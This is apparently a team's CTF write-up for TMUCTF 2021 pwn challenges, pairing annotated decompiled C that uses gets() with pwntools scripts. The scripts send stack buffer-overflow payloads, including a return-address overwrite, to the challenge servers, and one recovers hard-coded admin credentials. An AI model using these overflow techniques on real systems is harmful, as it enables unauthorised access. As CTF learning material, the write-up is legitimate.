/*
 * Decompiled main() of the "warmup" challenge; identifiers such as local_58
 * and local_c are decompiler-generated.
 *
 * Prompts for a name, reads it with gets() into a 76-byte stack buffer, and
 * runs `cat flag.txt` only if local_c is non-zero afterwards. The visible
 * code assigns local_c exactly once (to 0, before the read), so the branch
 * is reachable only when the read writes outside local_58.
 *
 * Defensive note: gets() takes no length argument and was removed from the
 * language in C11. A bounded read such as
 * fgets(local_58, sizeof local_58, stdin) keeps the write inside the buffer.
 */
int main() {
char local_58 [76];
/* NOTE(review): the offset-style names suggest local_c sits directly above
   local_58 on the stack (0x58 - 0x0c == 76) - confirm against the binary. */
int local_c;
/* Passing a null buffer to setbuf() makes each standard stream unbuffered. */
setbuf(stdout,(char *)0x0);
setbuf(stdin,(char *)0x0);
setbuf(stderr,(char *)0x0);
/* tmulogo() is defined elsewhere; presumably prints a banner - not shown. */
tmulogo();
puts("Welcome to TMUCTF 2021! Let us know your name: ");
local_c = 0;
/* Unbounded read: input longer than 75 characters plus the terminator is
   written past the end of local_58. */
gets(local_58);
puts("Thanks!\n");
/* Security decision made on a stack variable that no legitimate code path
   sets; it can only be non-zero after memory corruption. */
if (local_c != 0) {
system("cat flag.txt");
}
return 0;
}
Solution
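This is the first thing you learn when opening a book on reverse engineering/pwn: a buffer overflow to access the flag. gets() places no limit on the input, so a name longer than the 76-byte buffer is written past it and can change local_c, which is all the check in front of system("cat flag.txt") needs.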
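# pwntools client for the "warmup" service.
# The decompiled main() reads the name with gets() into a 76-byte buffer, so a
# longer line is written past the buffer; the check on local_c only needs that
# variable to end up non-zero.
# The page printed this script on a single line, which made the first '#'
# comment out the remainder; the line structure is restored here.
from pwn import *

# 78 filler bytes: longer than the 76-byte buffer declared in the decompiled main().
payload = b"A" * 78

#binary = process("./warmup")
binary = remote("194.5.207.56", 7000)

# Wait for the name prompt before sending the line.
print(binary.recvuntil(bytes("name:", "utf-8")))
binary.sendline(payload)
binary.interactive()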
Flag: TMUCTF{??????}
Baby Pwn [50 pts]
Description
Can you get the flag?
nc 194.5.207.56 7010, nc 185.239.107.54 7010
Decompiled Code
/*
 * Decompiled main() of the "babypwn" challenge; local_c is a
 * decompiler-generated name.
 *
 * Reads a name with gets() into a 28-byte stack buffer and calls
 * helloUser(name) only if local_c equals 0xcafe. The visible code assigns
 * local_c exactly once (to 0), so the call is reachable only when the read
 * writes outside `name`.
 *
 * Defensive note: gets() has no length limit and was removed in C11;
 * fgets(name, sizeof name, stdin) would bound the write.
 */
int main(void) {
char name [28];
/* NOTE(review): presumably placed directly above `name` on the stack -
   confirm against the binary. */
int local_c;
/* Passing a null buffer to setbuf() makes each standard stream unbuffered. */
setbuf(stdout,(char *)0x0);
setbuf(stderr,(char *)0x0);
setbuf(stdin,(char *)0x0);
/* tmulogo() is defined elsewhere; presumably prints a banner - not shown. */
tmulogo();
local_c = 0;
puts("Hi, Please enter your name: ");
/* Unbounded read into a 28-byte buffer. */
gets(name);
/* Gate on a value that no legitimate code path stores in local_c. */
if (local_c == 0xcafe) {
helloUser(name);
}
return 0;
}
/*
 * Decompiled helloUser(): greets the caller-supplied name, then reads a
 * second line with gets() into a 128-byte stack buffer.
 *
 * param_1 is typed undefined8 by the decompiler (an untyped 8-byte value);
 * it is printed with %s, so it is used as a pointer to a NUL-terminated
 * string.
 *
 * Defensive note: this frame has no flag variable, so an overflow of
 * local_88 lands on whatever lies above it. NOTE(review): that is typically
 * the saved frame pointer and return address - not visible in the
 * decompilation, confirm against the binary. A bounded read
 * (fgets(local_88, sizeof local_88, stdin)) removes the overflow; stack
 * protectors and position-independent executables are defence in depth,
 * not a substitute for the bound.
 */
void helloUser(undefined8 param_1) {
char local_88 [128];
/* The format string is a literal; the name is passed only as a %s argument. */
printf("Nice to meet you %s!\n",param_1);
puts("Tell me about yourself ;;)");
/* Unbounded read into a 128-byte buffer. */
gets(local_88);
puts("It was a pleasure meeting you.");
return;
}
Solution
This is a common warmup problem that appears in CTFs, so I went through it easily. Well, sort of. I grabbed some past code and worked out from the source what I needed to do. I did everything right, except it wasn't printing out the flag. Later on, another member looked it over and found that my address was completely wrong; a simple fix was all it took. The code is below.
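# pwntools client for the "babypwn" service.
# Both reads in the decompiled program use gets(), which has no length limit:
# main() reads into name[28] and helloUser() reads into local_88[128].
# The page printed this script on a single line, which made the first '#'
# comment out the remainder; the line structure is restored here.
from pwn import *
import time

# Value the decompiled main() compares local_c against.
addr1 = 0xcafe
# Address used for the second stage; per the write-up this is the value a
# teammate corrected.
flag_os = 0x4012f0

# Filler sized to the two buffers declared in the decompiled code.
payload = b"A" * 28
payload2 = b"A" * 128
newline = bytes('\n', 'utf-8')

#binary = process("./babypwn")
binary = remote('194.5.207.56', 7010)

print(binary.recvuntil(bytes("name:", "utf-8")))
binary.sendline(payload + p64(addr1))
# Makes it to Hello User

print(binary.recvuntil(bytes(")", "utf-8")))
# Get to here
binary.sendline(payload2 + p64(flag_os) + p64(flag_os))
binary.interactive()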
Flag: TMUCTF{??????}
Are you admin [198 pts] [Not Solved]
Description
Just admin can get the flag! Note that the admin likes integers!
nc 194.5.207.113 7020, nc 185.97.117.19 7020
/*
 * Decompiled main() of the "areyouadmin" challenge; iVar1, local_128 and
 * local_28 are decompiler-generated names.
 *
 * Reads a username and a password with gets() into two 64-byte stack
 * buffers, compares them with hard-coded strings, and additionally requires
 * five arithmetic relations among num1..num5 before printing the first line
 * of flag.txt.
 *
 * Defensive notes:
 *  - Both reads are unbounded; gets() was removed in C11 and
 *    fgets(buf, sizeof buf, stdin) would bound them.
 *  - The credentials are string literals in the binary, so anyone holding
 *    the file can recover them, as this decompilation shows.
 *  - The visible code only ever stores 0 in num1..num5, so the numeric
 *    relations cannot hold on any legitimate path; they can be satisfied
 *    only if memory next to the input buffers is overwritten.
 */
int main(void) {
int iVar1;
char local_128 [128];
char password [64];
char user [64];
FILE *local_28;
int num1;
int num2;
int num3;
int num4;
int num5;
/* Passing a null buffer to setbuf() makes each standard stream unbuffered. */
setbuf(stdout,(char *)0x0);
setbuf(stderr,(char *)0x0);
setbuf(stdin,(char *)0x0);
/* tmulogo() is defined elsewhere; presumably prints a banner - not shown. */
tmulogo();
num5 = 0;
num4 = 0;
num3 = 0;
num2 = 0;
num1 = 0;
puts("Enter username:");
/* Unbounded read into a 64-byte buffer. */
gets(user);
puts("Enter password:");
/* Unbounded read into a 64-byte buffer. */
gets(password);
iVar1 = strcmp(user,"AlexTheUser");
/* All of the following must hold: both strings match, and
     num3 + num5 * num4 == 0x253f
     num2 + num4 * num3 == 0x37a2
     num1 + num3 * num2 == 0x16d3
     num5 + num2 * num1 == 0x1bc9
     num4 + num1 * num5 == 0x703f */
if ((((iVar1 == 0) && (iVar1 = strcmp(password,"4l3x7h3p455w0rd"), iVar1 == 0)) &&
(num3 + num5 * num4 == 0x253f)) &&
(((num2 + num4 * num3 == 0x37a2 && (num1 + num3 * num2 == 0x16d3)) &&
((num5 + num2 * num1 == 0x1bc9 && (num4 + num1 * num5 == 0x703f)))))) {
local_28 = fopen("flag.txt","r");
if (local_28 == (FILE *)0x0) {
printf("Missing flag.txt. Contact an admin if you see this on remote.");
/* WARNING: Subroutine does not return */
exit(1);
}
/* 0x80 == 128 == sizeof local_128, so this read is bounded. Its return value
   is not checked, and the stream is never closed in the visible code. */
fgets(local_128,0x80,local_28);
printf("%s",local_128);
}
return 0;
}
Solution
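# pwntools client for the "areyouadmin" service (the write-up marks this
# challenge as not solved).
# As written, the script only submits the hard-coded credentials found in the
# decompiled main() and then closes the connection; the searches for the five
# integers are kept below as disabled string blocks.
# NOTE(review): the page printed this script on a single line, so line breaks
# and indentation are reconstructed. The nesting inside the disabled blocks is
# a best-effort guess.
from pwn import *

user = bytes("AlexTheUser", "utf-8")
password = bytes("4l3x7h3p455w0rd", "utf-8")
#print(len(p64(flag_address)))

#binary = process("./areyouadmin")
#binary.close()
binary = remote("194.5.207.113", 7020)

print(binary.recvuntil(bytes("username:", "utf-8")))
binary.sendline(user)
print(binary.recvuntil(bytes("password:", "utf-8")))
binary.sendline(password)
#binary.sendline(payload + p64(flag_address))
#binary.interactive()
binary.close()
print("made it to the numbers")

"""
top = 233
found = False
i1 = 0
i4 = 0
i5 = 0
while not found:
    for i2 in range(100, top):
        for i3 in range(100, top):
            i1 = (-1 * i3 * i2) + 0x16d3
            i4 = (0x37a2 - i2) / i3
            # Using New Known
            i5 = (0x253f - i3) / i4
            if (i5 + i2 * i1) == 0x1bc9:
                print(i1, i2, i3, i4, i5)
            if (i4 + i1 * i5) == 0x703f:
                print(i1, i2, i3, i4, i5)
"""
# 233 30 187 76 123
"""
    if (((num3 + num5 * num4 == 0x253f)) &&
     (((num2 + num4 * num3 == 0x37a2 && (num1 + num3 * num2 == 0x16d3)) &&
      ((num5 + num2 * num1 == 0x1bc9 && (num4 + num1 * num5 == 0x703f)))))) {
"""
"""
top = 100
for i1 in range(0 , 100):
    print(i1)
    for i2 in range(0 , 10000):
        for i3 in range(28, 32):
            for i4 in range(90, 100):
                for i5 in range(90, 100):
                    if (i3 + i5 * i4 == 9535):
                        if(i2 + i4 * i3 == 14242):
                            print(i2, i3, i4)
                            if(i1 + i3 * i2 == 5843):
                                if (i5 + i2 * i1 == 7113):
                                    if (i4 + i1 * i5 == 28735):
                                        print(i1, i2, i3, i4, i5)
"""
# Original Guess = 9535 14242 5843 7113 28735
#num1 + num3 * num2 == 0x16d3
#num3 + num5 * num4 == 0x253f
#num2 + num4 * num3 == 0x37a2
#num5 + num2 * num1 == 0x1bc9
#num4 + num1 * num5 == 0x703f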
Welcome
Warmup [50 pts]
Description
A fun visual cryptography tool will amaze your kids!
Note: Remember the flag format is TMUCTF{...}.
Solution
I noticed a small difference in the two file sizes and wondered what would happen if I combined the images. I overlaid one on top of the other and got the final image of the flag.